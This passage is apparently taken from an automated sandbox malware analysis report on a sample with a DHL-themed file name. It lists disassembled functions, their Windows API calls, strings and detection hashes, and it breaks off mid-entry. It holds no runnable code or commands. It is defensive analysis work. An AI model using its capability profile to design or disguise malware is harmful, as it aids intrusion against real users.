                                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00C92BEC,?), ref: 00C7846E
                                                                                        • IIDFromString.OLE32(?,?), ref: 00C784E1
                                                                                        • VariantInit.OLEAUT32(?), ref: 00C7857B
                                                                                        • VariantClear.OLEAUT32(?), ref: 00C785DC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                        • API String ID: 834269672-1287834457
                                                                                        • Opcode ID: dd25265b7bda5014ac565a5708be3e27d55c2cbe273c59869418ddc8788c2908
                                                                                        • Instruction ID: c4aa80639b773f4e1c671ae0fc1b34d46c1137cd3439b2694fd20e60fd873f3e
                                                                                        • Opcode Fuzzy Hash: dd25265b7bda5014ac565a5708be3e27d55c2cbe273c59869418ddc8788c2908
                                                                                        • Instruction Fuzzy Hash: 9961AE706483129FD710DF65C84CB6EB7E8AF49754F00851DFA9A9B291CB70EE48CB92
                                                                                        Function 00C02E26 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 186windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00C02EAE
                                                                                          • Part of subcall function 00C01DB3: GetClientRect.USER32(?,?), ref: 00C01DDC
                                                                                          • Part of subcall function 00C01DB3: GetWindowRect.USER32(?,?), ref: 00C01E1D
                                                                                          • Part of subcall function 00C01DB3: ScreenToClient.USER32(?,?), ref: 00C01E45
                                                                                        • GetDC.USER32 ref: 00C3CD32
                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00C3CD45
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00C3CD53
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00C3CD68
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00C3CD70
                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00C3CDFB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                        • String ID: @U=u$U
                                                                                        • API String ID: 4009187628-4110099822
                                                                                        • Opcode ID: 4b9fa1ba40f0f65cd62496406eec2c5d7a975079cb3badfa39a77ee2a0aba040
                                                                                        • Instruction ID: e429f150055628e0367e483edbc6a22a225eae96a60df8f8ad7129ea9bb54f9b
                                                                                        • Opcode Fuzzy Hash: 4b9fa1ba40f0f65cd62496406eec2c5d7a975079cb3badfa39a77ee2a0aba040
                                                                                        • Instruction Fuzzy Hash: DF71DF31510209DFCF219F64C8C4AAE7BB5FF48321F14426AFD65AA2A6D7319A81DB60
                                                                                        Function 00C75732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00C75793
                                                                                        • inet_addr.WSOCK32(?,?,?), ref: 00C757D8
                                                                                        • gethostbyname.WSOCK32(?), ref: 00C757E4
                                                                                        • IcmpCreateFile.IPHLPAPI ref: 00C757F2
                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C75862
                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C75878
                                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00C758ED
                                                                                        • WSACleanup.WSOCK32 ref: 00C758F3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                        • String ID: Ping
                                                                                        • API String ID: 1028309954-2246546115
                                                                                        • Opcode ID: 950056fd92e76722ae4b058b2882cd00cc710fdd8994f41d7518cf083fdb49d8
                                                                                        • Instruction ID: 81151d47126a1b7f9cb7f9de7e7ea1eef4713cbc4544012270a6e5c012428f5c
                                                                                        • Opcode Fuzzy Hash: 950056fd92e76722ae4b058b2882cd00cc710fdd8994f41d7518cf083fdb49d8
                                                                                        • Instruction Fuzzy Hash: A0518E316446009FDB109F25DC49B2A7BE4EF48720F148529F96ADB2E1DB70E905DB46
                                                                                        Function 00C6B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00C6B4D0
                                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C6B546
                                                                                        • GetLastError.KERNEL32 ref: 00C6B550
                                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 00C6B5BD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                        • API String ID: 4194297153-14809454
                                                                                        • Opcode ID: 8ef348a16beb314e5a04c0fb5c8d5df4ce39c166eb57a738b7054780618dc6f7
                                                                                        • Instruction ID: 1477b54c86540d80fef70be94121e0411608db6d3b81946af0d482e24d24aec6
                                                                                        • Opcode Fuzzy Hash: 8ef348a16beb314e5a04c0fb5c8d5df4ce39c166eb57a738b7054780618dc6f7
                                                                                        • Instruction Fuzzy Hash: A0318135A002059FCB20EBA8CC85FEE77B4FF05310F104165E516D7291DB719E86DB51
                                                                                        Function 00C861D3 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DeleteObject.GDI32(00000000), ref: 00C861EB
                                                                                        • GetDC.USER32(00000000), ref: 00C861F3
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C861FE
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00C8620A
                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C86246
                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C86257
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00C8902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00C86291
                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C862B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 3864802216-2594219639
                                                                                        • Opcode ID: 9f190b0415552c97188ddbb4f17ff7057218f54ed4175717c32cc16cc64811af
                                                                                        • Instruction ID: d91d102301bd627638a1e907bd136077146b747f40365049aa8eec1d1c0b8860
                                                                                        • Opcode Fuzzy Hash: 9f190b0415552c97188ddbb4f17ff7057218f54ed4175717c32cc16cc64811af
                                                                                        • Instruction Fuzzy Hash: 42317F72101214BFEB119F50CC8AFEA3BA9EF49765F044069FE08DA191D7759C42CB78
                                                                                        Function 00C788AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 00C788D7
                                                                                        • CoInitialize.OLE32(00000000), ref: 00C78904
                                                                                        • CoUninitialize.OLE32 ref: 00C7890E
                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00C78A0E
                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00C78B3B
                                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00C92C0C), ref: 00C78B6F
                                                                                        • CoGetObject.OLE32(?,00000000,00C92C0C,?), ref: 00C78B92
                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00C78BA5
                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C78C25
                                                                                        • VariantClear.OLEAUT32(?), ref: 00C78C35
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                        • String ID:
                                                                                        • API String ID: 2395222682-0
                                                                                        • Opcode ID: d3c43612c56f66cdedb6b3cb58a0a05783a9b374a58523425a36f74496c34204
                                                                                        • Instruction ID: 8481ace4fd7aa5ba26167c528c403129bfd2db4ff2dc09dbe2185452246d9994
                                                                                        • Opcode Fuzzy Hash: d3c43612c56f66cdedb6b3cb58a0a05783a9b374a58523425a36f74496c34204
                                                                                        • Instruction Fuzzy Hash: 03C119B16043059FD700DF64C888A2BB7E9FF89348F00895DF6999B251DB71ED4ACB52
                                                                                        Function 00C67990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00C67A6C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ArraySafeVartype
                                                                                        • String ID:
                                                                                        • API String ID: 1725837607-0
                                                                                        • Opcode ID: 9960f7974daac662b2c6a51a31cfbcbf6c2a60c735cf719618a4d8eb6299a13d
                                                                                        • Instruction ID: c7327999e68c8ca42f9fb696fdcf2c0b767486fc628ccc2ce441685343e3a60d
                                                                                        • Opcode Fuzzy Hash: 9960f7974daac662b2c6a51a31cfbcbf6c2a60c735cf719618a4d8eb6299a13d
                                                                                        • Instruction Fuzzy Hash: DBB18C7190421AAFDB20DFA4C8C4BBEB7F4EF49329F204A29E511A7291D734E941DB90
                                                                                        Function 00C611CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00C611F0
                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C60268,?,00000001), ref: 00C61204
                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00C6120B
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C60268,?,00000001), ref: 00C6121A
                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C6122C
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C60268,?,00000001), ref: 00C61245
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C60268,?,00000001), ref: 00C61257
                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C60268,?,00000001), ref: 00C6129C
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C60268,?,00000001), ref: 00C612B1
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C60268,?,00000001), ref: 00C612BC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                        • String ID:
                                                                                        • API String ID: 2156557900-0
                                                                                        • Opcode ID: 3e3558de305b5aab2fc33678f7fbe3993c6382bb90dd9a63cf89520c200992e0
                                                                                        • Instruction ID: 8c869391d01ff2d1dbe1e6bff13dd96dfc14e1dba6e1982ddb788c58076e249f
                                                                                        • Opcode Fuzzy Hash: 3e3558de305b5aab2fc33678f7fbe3993c6382bb90dd9a63cf89520c200992e0
                                                                                        • Instruction Fuzzy Hash: F331CE75600208FBDB209F95ED98F6E37A9EF54316F18422DFD50C61A0D7B49E428B60
                                                                                        Function 00C0FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C0FAA6
                                                                                        • OleUninitialize.OLE32(?,00000000), ref: 00C0FB45
                                                                                        • UnregisterHotKey.USER32(?), ref: 00C0FC9C
                                                                                        • DestroyWindow.USER32(?), ref: 00C445D6
                                                                                        • FreeLibrary.KERNEL32(?), ref: 00C4463B
                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C44668
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                        • String ID: close all
                                                                                        • API String ID: 469580280-3243417748
                                                                                        • Opcode ID: 811f96c95e2a33481956e92e30aff485010e30d1a3cb3eb3d4e4ff33b18bd9f1
                                                                                        • Instruction ID: fbdeec74f15fede528965ae38d6594a4bc4e99c31b2ee80dbbc72a6ef59adcd3
                                                                                        • Opcode Fuzzy Hash: 811f96c95e2a33481956e92e30aff485010e30d1a3cb3eb3d4e4ff33b18bd9f1
                                                                                        • Instruction Fuzzy Hash: D2A17C30301212CFDB29EF14C595BA9F364BF05710F6542ADE80AAB6A2DB30AD57DF90
                                                                                        Function 00C5A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • EnumChildWindows.USER32(?,00C5A439), ref: 00C5A377
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ChildEnumWindows
                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                        • API String ID: 3555792229-1603158881
                                                                                        • Opcode ID: 639d21ceebed89d88c63b950eca5a1df66822a80d526224391af2da7771a8049
                                                                                        • Instruction ID: bdfad236a6edf5f55903850e646f0577f3b64dfb013d3c19ead8313c10a3fa36
                                                                                        • Opcode Fuzzy Hash: 639d21ceebed89d88c63b950eca5a1df66822a80d526224391af2da7771a8049
                                                                                        • Instruction Fuzzy Hash: 2B91C634900605EACB08DFA1C892BEDFB74BF04305F508229EC5DA7191DB31AADDEB95
                                                                                        Function 00C8B351 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 199windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsWindow.USER32(013B77E0), ref: 00C8B3EB
                                                                                        • IsWindowEnabled.USER32(013B77E0), ref: 00C8B3F7
                                                                                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00C8B4DB
                                                                                        • SendMessageW.USER32(013B77E0,000000B0,?,?), ref: 00C8B512
                                                                                        • IsDlgButtonChecked.USER32(?,?), ref: 00C8B54F
                                                                                        • GetWindowLongW.USER32(013B77E0,000000EC), ref: 00C8B571
                                                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00C8B589
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 4072528602-2594219639
                                                                                        • Opcode ID: ab80b824b42abb079127642d065e3008aff410d000b1be8c13fda9c59154da25
                                                                                        • Instruction ID: 978432f2e0a62d9a8c432a4828b585b7eaf00e7b73a4277b349b3cdfded9c8de
                                                                                        • Opcode Fuzzy Hash: ab80b824b42abb079127642d065e3008aff410d000b1be8c13fda9c59154da25
                                                                                        • Instruction Fuzzy Hash: 1471BF34600604EFDB20AF64C895FBA7BB9EF49304F14415DF966972A2C731AE81DB58
                                                                                        Function 00C86D80 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 143windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C86E24
                                                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00C86E38
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C86E52
                                                                                        • _wcscat.LIBCMT ref: 00C86EAD
                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00C86EC4
                                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C86EF2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window_wcscat
                                                                                        • String ID: @U=u$SysListView32
                                                                                        • API String ID: 307300125-1908207174
                                                                                        • Opcode ID: d5d0aef091b7358cd7e80d64826ef3bdc894051b2fca9c8312f9e7f883ddee09
                                                                                        • Instruction ID: 3e3f714c592fb2f4b602afd8eddefea743cef923088868b48d0ab34d8aff35df
                                                                                        • Opcode Fuzzy Hash: d5d0aef091b7358cd7e80d64826ef3bdc894051b2fca9c8312f9e7f883ddee09
                                                                                        • Instruction Fuzzy Hash: CD41A171A00358AFEB21EF64CC85BEEB7B8EF08354F10052AF594E7291D6719E85CB64
                                                                                        Function 00C71A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C71A50
                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C71A7C
                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00C71ABE
                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C71AD3
                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C71AE0
                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00C71B10
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00C71B57
                                                                                          • Part of subcall function 00C72483: GetLastError.KERNEL32(?,?,00C71817,00000000,00000000,00000001), ref: 00C72498
                                                                                          • Part of subcall function 00C72483: SetEvent.KERNEL32(?,?,00C71817,00000000,00000000,00000001), ref: 00C724AD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                        • String ID:
                                                                                        • API String ID: 2603140658-3916222277
                                                                                        • Opcode ID: 42060c12efc4773c7fd0aefac61f1b640435a1355a854b193061e2912821e5aa
                                                                                        • Instruction ID: 95343ae26a1bb13a247a46ab14401c0c423a56ba968a53270911110a835920af
                                                                                        • Opcode Fuzzy Hash: 42060c12efc4773c7fd0aefac61f1b640435a1355a854b193061e2912821e5aa
                                                                                        • Instruction Fuzzy Hash: 79418EB1501218BFEB118F65CC89FBF7BACEF08354F04812AFE199A141E7749E459BA4
                                                                                        Function 00C862CD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
